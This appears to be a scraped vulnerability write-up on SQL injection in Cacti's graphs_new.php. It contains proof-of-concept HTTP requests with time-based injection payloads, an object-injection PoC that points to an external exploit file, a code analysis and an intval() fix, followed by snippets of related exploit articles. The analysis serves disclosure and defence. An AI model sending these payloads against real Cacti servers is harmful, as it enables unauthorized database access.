Cacti /graphs_new.php SQL Injection Vulnerability

catalogue

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133 [^]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Inject

1. Login
2. POST  http://target/cacti/graphs_new.php
   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
    {Injection exp can be found on my server: http://pandas.pw/cacti.exp}
3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--

3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
switch ($_REQUEST["action"]) {
    case ‘save‘:
        //track function form_save
        form_save();

        break;
    case ‘query_reload‘:
        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
        break;
    default:
        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");
        break;
}

form_save();

function form_save()
{
    ..
    if (isset($_POST["save_component_new_graphs"]))
    {
        //Track function host_new_graphs_save()
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

host_new_graphs_save();

function host_new_graphs_save()
{
    //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.
    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
    ..
    //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
    ..
}

0x2: Vuls-2: SQL Injection

function form_save()
{
    if (isset($_POST["save_component_graph"]))
    {
        /* summarize the ‘create graph from host template/snmp index‘ stuff into an array */
        while (list($var, $val) = each($_POST))
        {
            if (preg_match(‘/^cg_(\d+)$/‘, $var, $matches))
            {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            }
            //cg_g is not filtered
            elseif (preg_match(‘/^cg_g$/‘, $var))
            {
                if ($_POST["cg_g"] > 0)
                {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                }
            }
            elseif (preg_match(‘/^sg_(\d+)_([a-f0-9]{32})$/‘, $var, $matches))
            {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs))
        {
            //外部输入参数带入host_new_graphs中
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method=‘post‘ action=‘graphs_new.php‘>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                //sql injection in graph_template_id
                $graph_template_id = $form_id1; 

                html_start_box("<strong>Create Graph from ‘" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "‘", "100%", "", "3", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()
{
    ..
    /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
    ..
}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method=‘post‘ action=‘graphs_new.php‘>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                //sql injection in graph_template_id
                $graph_template_id = $form_id1;
                /**/
                $graph_template_id = intval($graph_template_id);
                /**/
                html_start_box("<strong>Create Graph from ‘" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "‘", "100%", "", "3", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

时间: 2024-08-15 00:24:37

Cacti /graphs_new.php SQL Injection Vulnerability的相关文章

DRUPAL-PSA-CORE-2014-005 &amp;&amp; CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Use Drupal to build everything from personal blogs to enterprise applications. Thousands of add-on modules and designs let you build any site you can imagine. Join us!Drupal是使用PHP语言编写的开

MyBB 18 SQL Injection Vulnerability

<?php error_reporting(0); ?> <form method="post" action=""> Input a Url(for example:http://myskins.org/18/) : <br><textarea name="siteler" cols="35" rows="7"></textarea><br

Zabbix 3.0.3 SQL Injection

Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ========================================== Title: Zabbix 3.0.3 SQL Injection Vulnerability Product: Zabbix Vulnerable Version(s): 2.2.x, 3.0.x Fixed Version: 3.0.4 Homepage: http

SQL injection

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit

CVE: 2014-6271 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

目录 1. 漏洞的起因 2. 漏洞原理分析 3. 漏洞的影响范围 4. 漏洞的POC.测试方法 5. 漏洞的修复Patch 1. 漏洞的起因 这个漏洞的起因源自于Bash(Bourne Again SHell)的ENV指令 http://ss64.com/bash/env.html env: Display, set, or remove environment variables, Run a command in a modified environment. Syntax env [OPT

ref:Manual SQL injection discovery tips

ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tips August 26, 2017 According to bugbountyforum.com's AMA format one of the most popular questions is How do you test for Server Side vulnerabilities su

使用sqlmap注入DVWA的SQL Injection菜单

1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用admin/password登陆系统,通过firebug工具获取cookie信息. 得到的cookie信息如下: security=low; path=/dvwa/; domain=192.168.0.112 PHPSESSID=0bec860709d15f590768b7713c69b52f; pa

Sql Injection 资料整理

注入类型 Boolean-based blind SQL injection(布尔型注入) Error-based SQL injection(报错型注入) UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) Time-based blind SQL injection(基于时间延迟注入) 数据库类型 -A:Access - M:MySQL- S:SQL Server- P:PostgreSQL-

MySQL SQL Injection Cheat Sheet

MySQL SQL Injection Cheat Sheet Some useful syntax reminders for SQL Injection into MySQL databases- This post is part of a series of SQL Injection Cheat Sheets.  In this series, I've endevoured to tabulate the data to make it easier to read and to u